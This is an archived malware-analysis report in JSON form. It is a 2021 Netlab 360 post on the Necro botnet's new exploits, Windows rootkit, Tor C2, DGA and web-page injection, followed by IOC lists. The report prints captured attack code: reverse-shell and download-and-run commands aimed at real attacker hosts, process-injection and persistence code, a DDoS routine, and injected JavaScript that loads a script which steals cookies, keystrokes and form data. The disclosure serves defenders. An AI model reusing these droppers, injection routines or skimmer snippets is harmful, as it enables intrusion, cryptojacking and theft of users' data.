{
	"id": "2f871e6c-06f1-4ee6-9efd-6330d78d072c",
	"created_at": "2026-04-06T00:22:01.938729Z",
	"updated_at": "2026-04-10T03:35:29.096295Z",
	"deleted_at": null,
	"sha1_hash": "c904724212b3f975ba64fb2d07dcee87c20e4360",
	"title": "Necro upgrades again, using Tor + dynamic domain DGA and aiming at both Windows \u0026 Linux",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 420030,
	"plain_text": "Necro upgrades again, using Tor + dynamic domain DGA and\r\naiming at both Windows \u0026 Linux\r\nBy jinye\r\nPublished: 2021-03-18 · Archived: 2026-04-02 10:55:54 UTC\r\nOverview\r\nBack in January, we blogged about a new botnet Necro and shortly after our report, it stopped spreading. On\r\nMarch 2nd, we noticed a new variant of Necro showing up on our BotMon tracking radar March 2nd, the BotMon\r\nsystem has detected that Necro has started spreading again, in addition to the previous TerraMaster RCE\r\n(CVE_2020_35665) and Zend RCE (CVE-2021-3007), two newer vulnerabilities Laravel RCE (CVE-2021-3129)\r\nand WebLogic RCE ( CVE-2020-14882) have been added, the following graphic shows the trend.\r\nWe found that after a month of silence the new version of Necro has been significantly changed and further\r\nenhanced, the following is a summary:\r\n1. Start to attack Windws system and use Rootkit to hide itself on Windows platform.\r\n2. \"subdomain DGA + dynamic domain name\" are being used to generate C2 domains\r\n3. C2 communication support Tor, and a Tor-based DDoS attacks has been added.\r\n4. It propagates Gafgyt_tor against specific Linux targets.\r\n5. It tampers with the web service page on the victim machine to perform browser mining, as well as stealing\r\nuser data, turning the user's browser into DDos bot, and hash cracking.\r\nWe mentioned earlier this month that Gafgyt_tor and Necro are released by same group, the so-called Keksec, the\r\nfunctions of this new Nerco is shown below\r\nhttps://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/\r\nPage 1 of 12\n\nIt is worth noting that we have seen two samples of the new version, one uses Tor for C2 and one generates C2 by\r\nusing \"subdomain DGA + dynamic domain.\r\nSample Analysis\r\nScanning and propagation\r\nLaravel RCE (CVE-2021-3129)\r\nThe exploit of this vulnerability uses a reverse shell to first download a bash script, as shown in the following\r\nfigure.\r\nZCgAMCXTa='php -r \\'$sock=fsockopen(\"'+self.YxqCRypO+'\",9999);$proc=proc_open(\"/bin/sh -i\", array(0=\u003e$sock, 1=\u003e\r\n ZCgAMCXTa=ZCgAMCXTa.replace('/', '\\/')\r\nThe downloaded bash script functions as follows.\r\n1. Download and execute another script malware.sh .\r\n2. Download and execute Gafgyt_tor.\r\n3. Download and execute the mining program.\r\nHere is a bash script we captured.\r\nhttps://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/\r\nPage 2 of 12\n\nwget http://kek.gay/malware.sh -O malware.sh\r\nsh malware.sh\r\nrm -f malware.sh\r\ncd /tmp || cd /home/$USER || cd /var/run || cd $(busybox find / -writable -readable -executable | head -n 1) ||\r\nwget http://45.145.185.83/S1eJ3/IObeENwjx64 -O IObeENwjx64; busybox wget http://45.145.185.83/S1eJ3/IObeENwjx64\r\n...\r\nexport ARGS=\"-o 45.145.185.83:9050\"\r\nexport LINE=\"[ ! -f /tmp/.apid ] \u0026\u0026 echo \u003e /tmp/.apid;./.1/sshd $ARGS \u003e\u003e /dev/null;./.2/sshd $ARGS \u003e\u003e /dev/null\r\necho \"$LINE\" \u003e ./.backup.sh\r\ncurl http://45.145.185.83/xmrig1 -O\r\nwget http://45.145.185.83/xmrig1 -O xmrig1\r\nmkdir ./.1;mv -f xmrig1 ./.1/sshd\r\n...\r\nchmod +x ./.backup.sh;\r\nsh ./.backup.sh \u0026\r\nexit\r\nOne of the malware.sh scripts is used to download and execute a new version of Necro, as shown below.\r\n#pkill -9 python\r\nwget http://45.144.225.96/benchmark.py -O benchmark.py\r\npython benchmark.py || python2 benchmark.py || python2.7 benchmark.py || /usr/bin/python benchmark.py || /usr/bi\r\nWebLogic RCE (CVE-2020-14882)\r\nThe vulnerability has two exploits, one for Linux and one for Windows.\r\nThe exploit for Linux uses bash, which downloads and executes both Necro (setup.py) and the mining program.\r\ncd /tmp||cd $(find / -writable -readable -executable | head -n 1);php -r \"file_put_contents(\\\\\".setup\\\\\", file_\r\nThe Windows exploit uses Powershell, which first downloads the packaged Pyhton 2.7 executable (py.exe), then\r\ndownloads and executes Necro (setup.py).\r\n\"@powershell -NoProfile -ExecutionPolicy unrestricted -Command \\\"(New-Object System.Net.WebClient).DownloadFile\r\nAttack Windows system\r\nFrom the above analysis, we can see that some WebLogic servers are running on Windows OS, and the KekSec\r\ngroup is obviously interested in these hosts as well. After the sample is started, if the underlying operating system\r\nis detected as Windows then py.exe will be copied to USERPROFILE\\\\$6829.exe , the code is shown in the\r\nfollowing figure.\r\nhttps://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/\r\nPage 3 of 12\n\nif os.name == 'nt':\r\n try:\r\n sys.argv[1]\r\n except IndexError:\r\n subprocess.Popen(GetCommandLine() + \" 1\", creationflags=8, close_fds=True)\r\n os.kill(os.getpid(),9)\r\n ehVfvaRFGMNE = CreateMutex(None, False, ehVfvaRFGMNE)\r\n if GetLastError() == ERROR_ALREADY_EXISTS:\r\n os.kill(os.getpid(),9)\r\n if os.path.abspath(sys.argv[0]).lower().endswith('.exe') and not os.path.abspath(sys.argv[0]).lower().endswi\r\n try:\r\n shutil.copyfile(os.path.abspath(sys.argv[0]), os.getenv('USERPROFILE') + '\\\\$6829.exe')\r\n os.startfile(os.getenv('USERPROFILE') + '\\\\$6829.exe')\r\n os.kill(os.getpid(),9)\r\n except:\r\n pass\r\n else:\r\nNecro will then download a file named x86.dll or x64.dll depending on the platform of choice:.\r\n try:\r\n shutil.copyfile(sys.executable, os.getenv('USERPROFILE') + '\\\\$6829.exe')\r\n except:\r\n pass\r\n try:\r\n if platform.architecture()[0].replace(\"bit\",\"\") == \"32\":\r\n eZazkoBSoXlO=ahFxoRRhxXE(urllib2.urlopen('http://' + RaRdhjkniVY + '/x86.dll').read())\r\n else:\r\n eZazkoBSoXlO=ahFxoRRhxXE(urllib2.urlopen('http://' + RaRdhjkniVY + '/x64.dll').read())\r\n threading.Thread(target=oFHPQFcppV, args=(eZazkoBSoXlO,)).start()\r\n except:\r\n pass\r\nThis dll file corresponds to an open source Rootkit project r77-rootkit, which according to the project description\r\ncan fully hide specific processes:.\r\nr77 is a ring 3 Rootkit that hides following entities from all processes:\r\nFiles, directories, named pipes, scheduled tasks\r\nProcesses\r\nCPU usage\r\nRegistry keys \u0026 values\r\nhttps://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/\r\nPage 4 of 12\n\nTCP \u0026 UDP connections\r\nIt is compatible with Windows 7 and Windows 10 in both x64 and x86 editions.\r\nNecro will then load the rootkit using a piece of shellcode using process injection from another open source\r\nproject, sRDI, which uses the following shellcode.\r\n # pack rootkit and shellcode\r\n ...\r\n gwObVdGd += struct.pack('b', ObianOdA - len(gwObVdGd) - 4)\r\n gwObVdGd += b'\\x00\\x00\\x00'\r\n gwObVdGd += b'\\x48\\x89\\xf4'\r\n gwObVdGd += b'\\x5e'\r\n gwObVdGd += b'\\xc3'\r\n if len(gwObVdGd) != ObianOdA:\r\n raise Exception('x64 bootstrap length: {} != bootstrapSize: {}'.format(len(gwObVdGd), ObianOdA))\r\n return gwObVdGd + dXQHuOmhsG + FVgoLCUS + fzWaJzyWo\r\n else:\r\n ...\r\n gwObVdGd += struct.pack('b', ObianOdA - len(gwObVdGd) - 4) # Skip over the remainder of instructions\r\n gwObVdGd += b'\\x00\\x00\\x00'\r\n gwObVdGd += b'\\x83\\xc4\\x14'\r\n gwObVdGd += b'\\xc9'\r\n gwObVdGd += b'\\xc3'\r\n if len(gwObVdGd) != ObianOdA:\r\n raise Exception('x86 bootstrap length: {} != bootstrapSize: {}'.format(len(gwObVdGd), ObianOdA))\r\n return gwObVdGd + dXQHuOmhsG + FVgoLCUS + fzWaJzyW\r\n \r\n # inject process\r\n FfyiMaCpdR = windll.kernel32.OpenProcess(0x1F0FFF, False, UjyuiVGyhiD)\r\n if not FfyiMaCpdR:\r\n cJaQhosf -= 1\r\n return\r\n llvOMLUBC = windll.kernel32.VirtualAllocEx(FfyiMaCpdR, 0, len(eZazkoBSoXlO), 0x00001000, 0x40)\r\n windll.kernel32.WriteProcessMemory(FfyiMaCpdR, llvOMLUBC, eZazkoBSoXlO, len(eZazkoBSoXlO), 0)\r\n if not windll.kernel32.CreateRemoteThread(FfyiMaCpdR, None, 0, llvOMLUBC, 0, 0, 0):\r\nFinally, Necro will register the bootstrap item to SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run :\r\n if os.name == 'nt':\r\n try:\r\n aReg = ConnectRegistry(None,HKEY_CURRENT_USER)\r\n aKey = OpenKey(aReg, r\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\", 0, KEY_WRITE)\r\n SetValueEx(aKey,'System explore',0, REG_SZ, os.getenv('USERPROFILE') + '\\\\$6829.exe ' + os.path.\r\n windll.kernel32.SetFileAttributesW(os.getenv('USERPROFILE') + '\\\\$6829.exe', FILE_ATTRIBUTE_HIDD\r\nhttps://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/\r\nPage 5 of 12\n\nexcept:\r\n pass\r\nUsing Tor communication\r\nSince we have seen the KekSec group using Tor to hide the real C2 in Gafgyt_tor, we are not surprised that the\r\nnew version of Necro supports Tor. What surprised us is that Necro actually integrates a Tor proxy-based DDoS\r\nattack method.\r\nThe Tor C2 communication code is as follows, and you can see the IPs and ports of multiple Tor proxies\r\nintegrated in it.\r\ntry:\r\n import socks\r\nexcept:\r\n f=open('socks.py', \"w\")\r\n f.write(urllib2.urlopen('https://raw.githubusercontent.com/mikedougherty/SocksiPy/master/socks.py').read())\r\n f.close()\r\n try:\r\n import socks\r\n except:\r\n exit(1)\r\n try:\r\n os.remove('socks.py')\r\n os.remove('socks.pyc')\r\n except:\r\n pass\r\nserver_list = ['192.248.190.123:8017', '192.248.190.123:8001', '88.198.82.11:9051', '52.3.115.71:9050', '185.117\r\n...\r\nself.onionserver='faw623ska5evipvarobhpzu4ntoru5v6ia5444krr6deerdnvpa3p7ad.onion'\r\nself.AJEwioE='#freakyonionz'\r\nself.Ajiowfe='FUCKWHITEHATZ'\r\n...\r\nThe code of the newly added DDoS attack method torflood is as follows.\r\n elif CjoRjhoMj[3]==\":\" + self.cmdprefix + 'torflood':\r\n try:\r\n import socks\r\n except:\r\n ...\r\n self.commSock.send('PRIVMSG %s :Unable to initilize socks module.\\n' % (MZqyBxdoS))\r\n for i in range(0, int(CjoRjhoMj[7])):\r\n threading.Thread(target=self.XoReERalPae,args=(CjoRjhoMj[4],CjoRjhoMj[5],int(CjoRjhoMj[6]),)\r\nhttps://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/\r\nPage 6 of 12\n\nself.commSock.send('PRIVMSG %s :Started Tor HTTP flood on URL: %s with %s threads\\n' % (MZqyBxdo\r\nSub-domain DGA + dynamic domain name\r\nThe new version of Necro updated the DGA mechanism, using DGA to generate subdomains, and then with\r\ndynamic domain names to generate the final C2 domain name. From the code we can see the there are 30 dynamic\r\ndomain name services providers.\r\nzMuBHdcdB=0\r\nwhile zMuBHdcdB \u003c 0xcc:\r\n zMuBHdcdB+=1\r\n random.seed(a=0x7774DEAD + zMuBHdcdB)\r\n RaRdhjkniVY=(''.join(random.choice('abcdefghijklmnopqoasadihcouvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') f\r\n RaRdhjkniVY+=\".\"+random.choice(['ddns.net','ddnsking.com','3utilities.com','bounceme.net','freedynamicdns.ne\r\n print RaRdhjkniVY\r\nNine domains are live now, and from the resolution records some domains uses IPv6 addresses.\r\n2021-03-09 10:50:50 2021-03-12 16:10:45 ntxkg0la99w.zapto.org\r\n2021-03-12 08:19:49 2021-03-12 08:19:49 xxdqj6xbjpkzhk7k.servemp3.com\r\n2021-03-12 10:35:11 2021-03-12 10:35:11 qb7opowcawiagia.viewdns.net\r\n2021-03-12 08:46:28 2021-03-12 08:46:28 v5jke3mv89fjvxgd.serveftp.com\r\n2021-03-12 14:59:54 2021-03-12 14:59:54 nwpzhm8ziyhdzm.redirectme.net\r\n2021-03-12 03:12:07 2021-03-12 03:12:07 m1afommgsdowkmegc.redirectme.net\r\n2021-03-12 04:56:47 2021-03-12 04:56:47 ewmhkvdcoj3.servemp3.com\r\n2021-03-12 08:38:17 2021-03-12 08:38:17 tfcxvcg0lkc9vpx.myftp.org\r\n2021-03-12 06:48:19 2021-03-12 06:48:19 bdcauhuzk0d.viewdns.net\r\nJS code embedding\r\nThe main purpose of Necro's JS code embedding is to inject mining code in victim’s web pages.\r\nelif CjoRjhoMj[3]==\":\" + self.cmdprefix + 'injectcount':\r\n self.commSock.send('PRIVMSG %s :I have injected into %s files total\\n' % (MZqyBxdoS, self.AkvElneS))\r\nelif CjoRjhoMj[3]==\":\" + self.cmdprefix + 'reinject':\r\n threading.Thread(target=self.OLkEqimhli).start()\r\n self.commSock.send('PRIVMSG %s :Re-injecting all html and js files\\n' % (MZqyBxdoS))\r\nNecro will first traverse the '*.js', '*.html', '*.htm', '*.php' files in the specified directory of the infected\r\ndevice to find the target of injection.\r\nif os.name != \"nt\":\r\n self.AkvElneS=0\r\nhttps://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/\r\nPage 7 of 12\n\nfor fkEoBpoAxpZc in [ele for ele in os.listdir(\"/\") if ele not in ['proc', \"bin\", 'sbin', 'sbin', \"dev\", \"li\r\n for hfHpWZSupopK in ['*.js', '*.html', '*.htm', '*.php']:\r\n for oGADwYHVg in os.popen(\"find \\\"/\" + fkEoBpoAxpZc + \"\\\" -type f -name \\\"\" + hfHpWZSupopK + \"\\\"\").r\r\n oGADwYHVg = oGADwYHVg.replace(\"\\r\", \"\").replace(\"\\n\", \"\")\r\n if 'node' not in oGADwYHVg and 'lib' not in oGADwYHVg and \"npm\" not in oGADwYHVg and oGADwYHVg !\r\n self.chLYewdc(oGADwYHVg)\r\nOnce the target is found, Necro inserts a piece of code into the file.\r\nMnPbIqasMz=open(oGADwYHVg,\"rb\")\r\n mkkzygnopRnB=MnPbIqasMz.read()\r\n MnPbIqasMz.close()\r\n fPSqTAZGgcep = kdYaxMPRdP(8)\r\n OGipqKBSmmTb = kdYaxMPRdP(8)\r\n hgOlaeQcQza = b64encode(\"//\" + self.injectCOxhTEJfB + '/campaign.js')\r\n fwEiSidxlgH='(function(' + OGipqKBSmmTb + \", \" + fPSqTAZGgcep + \") {\" + fPSqTAZGgcep + \" = \" + OGipq\r\n ...\r\n else:\r\n if oGADwYHVg.endswith(\".js\"):\r\n if 'var ' in mkkzygnopRnB:\r\n mkkzygnopRnB=self.kRChazSiN(mkkzygnopRnB, 'var ', fwEiSidxlgH + 'var ', 1)\r\n self.AkvElneS+=1\r\n wQARXUaaF = True\r\n else:\r\n if '\u003c/body' in mkkzygnopRnB:\r\n mkkzygnopRnB=self.kRChazSiN(mkkzygnopRnB, '\u003c/body', '\u003cscript type=' + '\"' + 'text/javasc\r\n self.AkvElneS+=1\r\n wQARXUaaF = True\r\n if wQARXUaaF:\r\n MnPbIqasMz=open(oGADwYHVg, \"wb\")\r\nThe infected page will have the following additional code.\r\n(function(v2, v1) {\r\n v1 = v2.createElement('script');\r\n v1.type = 'text/javascript';\r\n v1.async = true;\r\n v1.src = atob('UUIDLy91YmxvY2stcmVmZXJlci5kZXYvY2FtcGFpZ24uanM=UUID'.replace(/UUID/gi, '')) + '?' + String(M\r\n v2.getElementsByTagName('body')[0].appendChild(v1);\r\n}(document));\r\nThis small piece of code will link to a script hxxp[:]//ublock-referer.dev/campaign.js . Through our\r\nWebInsight system we can see that 300+ websites have been infected by Necro in the last week.\r\nhttps://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/\r\nPage 8 of 12\n\ncampaign.js is a highly obfuscated javascript code with a detection rate of 0 on VT.\r\nThe code uses two layers of obfuscation, it has three main functions.\r\nMining\r\nWhen an end user visits the victim’s website, the browser will load a mining js script: hxxps[:]//cloud-miner.de/tkefrep/tkefrep.js?tkefrep=bs?nosaj=faster.xmr2\r\nUser data stealing\r\nThe code monitors 4 events unload/beforeunload/popstate/pagehide and then reports the data through the\r\nfollowing two interfaces\r\nInterface Functions\r\n/l.php upload keyboad records\r\n/f.php upload form data\r\nExecute instruction\r\nWhen end users access victim’s website, the malicious js will be loaded, and ublock-referer.dev/api.ph will\r\nbe called to perform various functions and send back some of the users’ data, a brief breakdown of the functions\r\nCommand Functions Interface\r\ncookie To send back cookie /c.php\r\nclipboard To send back clipboard content /cb.php\r\nview Calling iframe to load any url\r\nhttps://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/\r\nPage 9 of 12\n\nCommand Functions Interface\r\npost Send POST request to target\r\nfloodpost DDos a target with periodical POST requests\r\nload\r\nPeriodically adding Image objects and requesting links to specified resources to\r\nDDos a target\r\nantiddos\r\nBy adding iframes periodically and adding random strings of numbers after the\r\ntarget link to DDos target\r\nlayer4\r\nPeriodically sending POST requests of random content of specified length range\r\nto the target (DDoS)\r\njack\r\nLoad the specified content by creating iframe, can be used to fake or hijack\r\nwebpage\r\neval Execute arbitrary code via the eval method\r\nmd5/sha1\r\nPerform collision attacks against MD5 with the specified length range and code\r\ntable, and report back when it succeeds\r\n/h.php\r\nThe corresponding C2 is still hxxp[:]//ublock-referer.dev/ , switching between http/https according to the\r\nprotocol of the compromised site\r\nmaster = window[\"location\"][\"protocol\"] + \"//ublock-referer.dev\";\r\nAPIKey = \"callbackScript\";\r\nThe URL hxxps[:]//ublock-referer.dev is also used to download the malicious FireFox plug-in\r\nublock_referer-1.0.0-an+fx.xpi , the plug-in uses the above mentioned Javascript Bot Cloud9.\r\nCode obfuscation algorithm\r\nThis new version of Necro abandoned the original simple variable name replacement algorithm, and implemented\r\na code morphing algorithm based on the abstract syntax tree AST, which achieves full complete randomization of\r\nobject names and higher code coverage of obfuscation, with the result that the new version of Necro sample VT\r\ndetection rate of 0.\r\nhttps://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/\r\nPage 10 of 12\n\ndDojPSRD=open(ULTiBINyz,\"rb\")\r\n ...\r\n p = ast.parse(CFiLMBZFoL)\r\n MiaFfQWZhb().visit(p)\r\n for caSZxzOdnbhJ in sorted(mdSaCUFhqM, key=len, reverse=True):\r\n ...\r\n EqDdlmuEhx = [node.name for node in ast.walk(p) if isinstance(node, ast.ClassDef)]\r\n joPNpGTbcn = sorted({node.id for node in ast.walk(p) if isinstance(node, ast.Name) and not isinstance(node.\r\n for mFVUeqoHs in [n for n in p.body if isinstance(n, ast.FunctionDef)]:\r\n aPpaAZnhc.append(mFVUeqoHs.name)\r\n EqDdlmuEhx = [node for node in ast.walk(p) if isinstance(node, ast.ClassDef)]\r\n for ubhohFYJDo in EqDdlmuEhx:\r\n for mFVUeqoHs in [n for n in ubhohFYJDo.body if isinstance(n, ast.FunctionDef)]:\r\n if mFVUeqoHs.name != '__init__' and mFVUeqoHs not in aPpaAZnhc:\r\n aPpaAZnhc.append(mFVUeqoHs.name)\r\n ...\r\n hkaxeZCocag=open(ULTiBINyz,\"wb\")\r\nSummary\r\nSince Necro was discovered, we have been continuously following and tracking this botnet, and associated it with\r\nthe KekSec group behind it, and discovered more of their activities to attack Linux devices. We will continue to\r\nkeep an eye on Necro, and will disclose any new findings.\r\nIOC\r\nTor C2\r\nfaw623ska5evipvarobhpzu4ntoru5v6ia5444krr6deerdnvpa3p7ad.onion\r\nDownload URL\r\nhttp://ntxkg0la99w.zapto.org/setup.py\r\nhttp://kek.gay/benchmark.py\r\nhttp://kek.gay/x86.dll\r\nhttp://kek.gay/x64.dll\r\nhttp://kek.gay/xmrig1.py\r\nhttp://kek.gay/xmrig1\r\nhttp://kek.gay/py.exe\r\nJS Miner/Bot Related\r\nhttps://cloud-miner.de/*\r\nhttps://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/\r\nPage 11 of 12\n\nhttps://ublock-referer.dev/*\r\nTor Proxy\r\n77.238.128.166:9050\r\n192.248.190.123:8017\r\n192.248.190.123:8009\r\n213.251.238.186:9050\r\n178.62.242.15:9107\r\n88.198.82.11:9051\r\n52.3.115.71:9050\r\n83.217.28.46:9050\r\n147.135.208.44:9095\r\n188.166.34.137:9000\r\n103.233.206.22:179\r\n161.97.71.22:9000\r\n54.161.239.214:9050\r\n194.5.178.150:666\r\n144.91.74.241:9080\r\n134.209.230.13:8080\r\n201.40.122.152:9050\r\n206.81.27.29:8080\r\n127.0.0.1:9050\r\nReaders are always welcomed to reach us on twitter, or email to netlabat 360dot cn\r\nSource: https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/\r\nhttps://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/"
	],
	"report_names": [
		"necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux"
	],
	"threat_actors": [
		{
			"id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0",
			"created_at": "2022-10-25T15:50:23.710403Z",
			"updated_at": "2026-04-10T02:00:05.281246Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"Whisper Spider"
			],
			"source_name": "MITRE:Silence",
			"tools": [
				"Winexe",
				"SDelete"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5a270f6c-2c13-4abf-861e-7d44dcfa5ceb",
			"created_at": "2023-11-03T02:00:07.794425Z",
			"updated_at": "2026-04-10T02:00:03.383096Z",
			"deleted_at": null,
			"main_name": "Keksec",
			"aliases": [],
			"source_name": "MISPGALAXY:Keksec",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7",
			"created_at": "2025-03-29T02:05:20.764715Z",
			"updated_at": "2026-04-10T02:00:03.851829Z",
			"deleted_at": null,
			"main_name": "GOLD WYMAN",
			"aliases": [
				"Silence "
			],
			"source_name": "Secureworks:GOLD WYMAN",
			"tools": [
				"Silence"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "88e53203-891a-46f8-9ced-81d874a271c4",
			"created_at": "2022-10-25T16:07:24.191982Z",
			"updated_at": "2026-04-10T02:00:04.895327Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"ATK 86",
				"Contract Crew",
				"G0091",
				"TAG-CR8",
				"TEMP.TruthTeller",
				"Whisper Spider"
			],
			"source_name": "ETDA:Silence",
			"tools": [
				"EDA",
				"EmpireDNSAgent",
				"Farse",
				"Ivoke",
				"Kikothac",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Meterpreter",
				"ProxyBot",
				"ReconModule",
				"Silence.Downloader",
				"TiniMet",
				"TinyMet",
				"TrueBot",
				"xfs-disp.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434921,
	"ts_updated_at": 1775792129,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c904724212b3f975ba64fb2d07dcee87c20e4360.pdf",
		"text": "https://archive.orkl.eu/c904724212b3f975ba64fb2d07dcee87c20e4360.txt",
		"img": "https://archive.orkl.eu/c904724212b3f975ba64fb2d07dcee87c20e4360.jpg"
	}
}